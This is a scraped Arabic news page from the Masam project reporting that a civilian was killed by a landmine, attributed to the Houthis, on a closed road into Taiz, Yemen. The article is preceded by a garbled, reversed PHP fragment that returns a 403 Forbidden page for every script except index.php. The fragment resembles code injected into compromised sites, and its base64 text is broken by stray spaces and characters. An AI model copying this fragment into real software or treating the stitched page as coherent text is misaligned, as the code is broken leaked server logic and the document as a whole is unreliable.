php?< if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDIC ItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw +PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aX RsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9 oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB 0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC } ;)(9ib2R5PjwvaHRtbD4=");die >? مقتل مدني بلغم حوثي في تعز - مشروع مسام
WhatsApp Image 2021 10 25 at 13.34.57

أودى لغم حوثي بحياة مواطن بعد انفجار سيارته أثناء محاولته العبور من طريق مغلقة ومفخخة بالألغام التي زرعتها ميليشيا الحوثي، إبان إطلاقها الحرب وفرض حصارها على مدينة تعز، جنوب غربي اليمن، قبل عدة سنوات.

وفي تفاصيل الحادثة قال الناشط “أحمد الباشا” إن الـ”مواطنا حاول الدخول بسيارته عبر طريق جولة القصر المغلق منذ سنوات لتختطف الألغام التي زرعها الحوثيين حياته”.

وأضاف “الباشا” في منشور مرفق بالصور على حسابه بـ “فيسبوك” أن الضحية هو المواطن “هشام عبده راوح” والذي حاول الدخول إلى تعز عبر طريق “جولة القصر” المغلق منذ بداية الحرب بعد أن ضاق ذرعاً من الطريق الطويلة والوعرة للوصول إلى داخل المدينة من أجل لقاء أسرته”.

وأشار نقلاً عن مصادر مطلعة، إلى أن لغما أرضيا مضادا للدبابات انفجر بسيارة هشام، أدى إلى وفاته على الفور.

الجدير بالذكر أن محافظة تعز المكتظة بالسكان تعيش حصاراً مفروضا من قبل ميليشيا الحوثي منذُ بدء الحرب، أجبر المواطنين على اللجوء إلى طرق فرعية وعرة، يقضون عبرها ساعات طويلة للوصول الى المدينة.

كما قامت الميليشيا الى جانب حصارها لتعز، بزرع آلاف الألغام بطريقة عشوائية في محيط المدينة، أدت إلى مقتل وإصابة آلاف المدنيين ونفوق المواشي طوال سنوات الحرب.

شارك المقال

واتس اب
لينكد إن
تويتر
الفيسبوك
Go to Top